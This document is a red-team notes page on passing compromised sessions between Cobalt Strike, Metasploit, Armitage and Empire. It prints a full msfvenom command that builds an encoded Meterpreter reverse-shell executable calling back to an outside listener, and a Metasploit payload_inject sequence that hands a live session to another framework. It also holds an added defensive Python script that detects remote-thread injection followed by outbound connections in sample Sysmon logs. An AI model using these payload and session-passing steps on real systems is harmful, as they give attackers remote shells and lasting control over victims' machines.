Cobalt Strike notes: passing shells between CS and MSF, Armitage and Empire


0x01 Passing a shell from Metasploit to Cobalt Strike

Generate the payload:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytes


MSF passing the session to CS:

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.5.4
msf exploit(payload_inject) > set LPORT 4444
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit


Then create a windows/foreign/reverse_tcp listener in Cobalt Strike, and configure that listener to match the Metasploit handler settings.


CS passing the session to MSF:


Start the matching handler in MSF:

Note:
By default, payload_inject starts a new handler locally after it runs. Since we already have one, there is no need to start another, so here we set
set DisablePayloadHandler true

If the error "PID does not actually exist" appears, set the pid of the process to inject into: set pid <process id>
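The payload_inject step above leaves a distinctive host-side footprint: an already-running process creates a thread in another process, and that second process then opens a connection to the new listener. The script below is an added example, not part of the original note, that correlates constructed Sysmon-style events (event ID 8, CreateRemoteThread, followed within a short window by event ID 3, NetworkConnect, from the injected pid) to flag that pattern; the pipe-separated log format, pids and timestamps are all constructed, while the Sysmon event IDs are real.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Real Sysmon event IDs: 8 = CreateRemoteThread, 3 = NetworkConnect.
CREATE_REMOTE_THREAD = 8
NETWORK_CONNECT = 3


@dataclass
class Event:
    ts: datetime
    event_id: int
    pid: int          # process that performed the action
    target_pid: int   # event 8 only: process that received the thread (else 0)
    dest: str         # event 3 only: "ip:port" (else "")


def parse(line: str) -> Event:
    # Constructed pipe-separated format, not Sysmon's native XML/EVTX.
    ts, eid, pid, tpid, dest = line.split("|")
    return Event(datetime.fromisoformat(ts), int(eid), int(pid), int(tpid), dest)


def find_injected_callbacks(lines, window=timedelta(seconds=30)):
    """Return (injector_pid, victim_pid, dest) for every process that received a
    remote thread from a different process and then connected out within `window`."""
    events = sorted((parse(l) for l in lines), key=lambda e: e.ts)
    injected = {}   # victim pid -> (time of injection, injecting pid)
    hits = []
    for e in events:
        if e.event_id == CREATE_REMOTE_THREAD and e.pid != e.target_pid:
            injected[e.target_pid] = (e.ts, e.pid)
        elif e.event_id == NETWORK_CONNECT and e.pid in injected:
            t0, injector = injected[e.pid]
            if e.ts - t0 <= window:
                hits.append((injector, e.pid, e.dest))
    return hits


# Constructed sample: pid 4120 (the existing implant) injects into pid 2316,
# which then calls back to the listener address used in the note above.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00|8|4120|2316|",
    "2024-01-01T10:00:02|3|2316|0|192.168.5.4:4444",
    "2024-01-01T10:05:00|3|900|0|10.0.0.5:443",    # ordinary outbound traffic
    "2024-01-01T10:10:00|8|700|700|",             # thread in own process: ignored
]

if __name__ == "__main__":
    for injector, victim, dest in find_injected_callbacks(SAMPLE_EVENTS):
        print(f"pid {victim} got a remote thread from pid {injector}, then connected to {dest}")
```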


0x02 Passing shells between Cobalt Strike and Armitage

First configure a handler in Armitage.

The payload must use the same protocol as the Cobalt Strike foreign listener.


Armitage passing a shell to Cobalt Strike

Select the session in Armitage, right-click, Access --> Pass Session


0x03 Passing sessions between Cobalt Strike and Empire

(Empire) > help

Commands
========
agents            Jump to the Agents menu.
creds             Add/display credentials to/from the database.
exit              Exit Empire
help              Displays the help menu.
list              Lists active agents or listeners.
listeners         Interact with active listeners.
reload            Reload one (or all) Empire modules.
reset             Reset a global option (e.g. IP whitelists).
searchmodule      Search Empire module names/descriptions.
set               Set a global option (e.g. IP whitelists).
show              Show a global option (e.g. IP whitelists).
usemodule         Use an Empire module.
usestager         Use an Empire stager.


Add a foreign listener in Cobalt Strike using the http protocol.


Empire receives the session.
